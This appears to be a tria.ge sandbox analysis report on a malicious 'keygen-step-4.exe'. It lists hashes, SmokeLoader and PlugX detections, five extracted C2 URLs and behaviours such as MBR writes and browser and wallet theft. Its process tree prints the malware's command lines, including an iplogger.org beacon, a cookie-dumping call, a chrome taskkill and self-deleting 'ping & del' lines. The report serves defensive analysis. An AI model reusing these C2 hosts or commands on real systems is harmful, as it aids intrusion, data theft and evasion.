Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

keygen-step-4.exe

windows7_x64

10

keygen-step-4.exe

windows10_x64

10

Resubmissions

13/02/2021, 11:21

210213-7tzhc75v52 10

13/02/2021, 11:08

210213-tgl7w9bhm2 10

Analysis

  • max time kernel
    151s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13/02/2021, 11:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    keygen-step-4.exe

  • Size

    6.8MB

  • MD5

    38f1d6ddf7e39767157acbb107e03250

  • SHA1

    dcb0d5feacb80c1e4cbb71a30cff7edf10a185e8

  • SHA256

    97ada84ef77a3b45abd2e14caf519e06bbbad5a6ed180aa6ee543e38e9bce796

  • SHA512

    3ba909b5001a3b995ebe8f9dbd4ddb6506a5c66612cf43e94a50f72c543a9aa4828bbba224db807de10076c5e70fabf7cc31bf8e442a3f4cf26d95c7f7094c2d

Score
10/10
plugxsmokeloaderbackdoorbootkitdiscoveryevasionmacropersistencespywarethemidatrojanupxxlm

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/
rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Executes dropped EXE 22 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • themida 2 IoCs

    Detects Themida, Advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 48 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\SysWOW64\msiexec.exe
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        3⤵
        • Enumerates connected drives
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:904
      • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
        C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          4⤵
            PID:1516
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            4⤵
              PID:932
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              4⤵
                PID:1568
              • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                4⤵
                • Executes dropped EXE
                PID:2852
              • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Writes to the Master Boot Record (MBR)
                PID:2916
              • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
                C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3052
                • C:\Users\Admin\AppData\Local\Temp\is-BGMJT.tmp\23E04C4F32EF2158.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-BGMJT.tmp\23E04C4F32EF2158.tmp" /SL5="$6019A,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:3068
                  • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                    "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    PID:1536
                    • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                      "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:2248
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                    6⤵
                      PID:1200
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe7
                        7⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:1408
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1408 CREDAT:275457 /prefetch:2
                          8⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:2120
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
                  4⤵
                    PID:1632
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      5⤵
                      • Runs ping.exe
                      PID:2512
                • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
                  C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
                  3⤵
                  • Executes dropped EXE
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of WriteProcessMemory
                  PID:1416
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:436
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      5⤵
                      • Kills process with taskkill
                      PID:1068
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
                    4⤵
                      PID:1760
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        5⤵
                        • Runs ping.exe
                        PID:1344
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:344
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      4⤵
                      • Runs ping.exe
                      PID:680
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
                  2⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:652
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies data under HKEY_USERS
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1464
                  • C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe
                    "C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:436
                    • C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe
                      "C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe"
                      4⤵
                      • Executes dropped EXE
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1576
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
                    3⤵
                      PID:2072
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1
                        4⤵
                        • Runs ping.exe
                        PID:2136
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2104
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:2196
                      • C:\ProgramData\1955041.21
                        "C:\ProgramData\1955041.21"
                        4⤵
                        • Executes dropped EXE
                        PID:2308
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 516
                          5⤵
                          • Loads dropped DLL
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2580
                      • C:\ProgramData\6437690.70
                        "C:\ProgramData\6437690.70"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        PID:2336
                        • C:\ProgramData\Windows Host\Windows Host.exe
                          "C:\ProgramData\Windows Host\Windows Host.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:2708
                      • C:\ProgramData\894661.9
                        "C:\ProgramData\894661.9"
                        4⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2372
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    PID:2420
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      3⤵
                      • Executes dropped EXE
                      PID:2488
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2808
                • C:\Windows\system32\msiexec.exe
                  C:\Windows\system32\msiexec.exe /V
                  1⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:472
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding E91876D95E53DF5438225681C4D01531 C
                    2⤵
                    • Loads dropped DLL
                    PID:572

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/296-2-0x0000000076381000-0x0000000076383000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/436-69-0x0000000000840000-0x0000000000851000-memory.dmp

                  Filesize

                  68KB

                  Download

                • memory/436-76-0x0000000000220000-0x0000000000265000-memory.dmp

                  Filesize

                  276KB

                  Download

                • memory/472-15-0x000007FEFC0A1000-0x000007FEFC0A3000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/652-39-0x0000000073AE0000-0x0000000073C83000-memory.dmp

                  Filesize

                  1.6MB

                  Download

                • memory/932-63-0x0000000000060000-0x0000000000061000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1244-187-0x0000000002D90000-0x0000000002DA6000-memory.dmp

                  Filesize

                  88KB

                  Download

                • memory/1416-43-0x0000000003690000-0x0000000003B3F000-memory.dmp

                  Filesize

                  4.7MB

                  Download

                • memory/1464-55-0x0000000000020000-0x000000000002D000-memory.dmp

                  Filesize

                  52KB

                  Download

                • memory/1464-68-0x00000000028A0000-0x00000000028EC000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/1516-49-0x0000000000060000-0x0000000000061000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1516-45-0x0000000010000000-0x0000000010057000-memory.dmp

                  Filesize

                  348KB

                  Download

                • memory/1536-174-0x0000000002260000-0x0000000002361000-memory.dmp

                  Filesize

                  1.0MB

                  Download

                • memory/1576-71-0x0000000000400000-0x0000000000448000-memory.dmp

                  Filesize

                  288KB

                  Download

                • memory/1576-79-0x0000000000400000-0x0000000000448000-memory.dmp

                  Filesize

                  288KB

                  Download

                • memory/1940-42-0x00000000033F0000-0x000000000389F000-memory.dmp

                  Filesize

                  4.7MB

                  Download

                • memory/1976-11-0x0000000010000000-0x000000001033D000-memory.dmp

                  Filesize

                  3.2MB

                  Download

                • memory/1976-48-0x000007FEF6580000-0x000007FEF67FA000-memory.dmp

                  Filesize

                  2.5MB

                  Download

                • memory/2104-89-0x0000000001010000-0x0000000001011000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2196-100-0x0000000000B60000-0x0000000000B61000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2196-104-0x0000000000160000-0x0000000000161000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2196-102-0x0000000000130000-0x0000000000131000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2196-99-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2196-103-0x0000000000140000-0x000000000015E000-memory.dmp

                  Filesize

                  120KB

                  Download

                • memory/2196-113-0x000000001AF10000-0x000000001AF12000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/2248-180-0x00000000051B0000-0x00000000051C1000-memory.dmp

                  Filesize

                  68KB

                  Download

                • memory/2248-182-0x0000000000020000-0x000000000002A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/2248-183-0x0000000000030000-0x000000000003A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/2248-184-0x0000000000400000-0x000000000040A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/2308-108-0x00000000733A0000-0x0000000073A8E000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/2308-132-0x0000000000C40000-0x0000000000C41000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2336-112-0x00000000733A0000-0x0000000073A8E000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/2336-148-0x0000000000670000-0x0000000000671000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2336-146-0x0000000000330000-0x000000000033B000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/2336-135-0x0000000000350000-0x0000000000351000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2372-147-0x0000000000920000-0x0000000000921000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2372-133-0x00000000009A0000-0x00000000009A1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2372-127-0x00000000733A0000-0x0000000073A8E000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/2580-155-0x0000000001B90000-0x0000000001B91000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2580-140-0x0000000001CC0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  68KB

                  Download

                • memory/2708-152-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2708-156-0x0000000004930000-0x0000000004931000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2708-151-0x00000000733A0000-0x0000000073A8E000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/2916-169-0x000000000C790000-0x000000000C791000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3052-167-0x0000000000401000-0x000000000040C000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/3068-168-0x0000000000240000-0x0000000000241000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3068-166-0x0000000070731000-0x0000000070733000-memory.dmp

                  Filesize

                  8KB

                  Download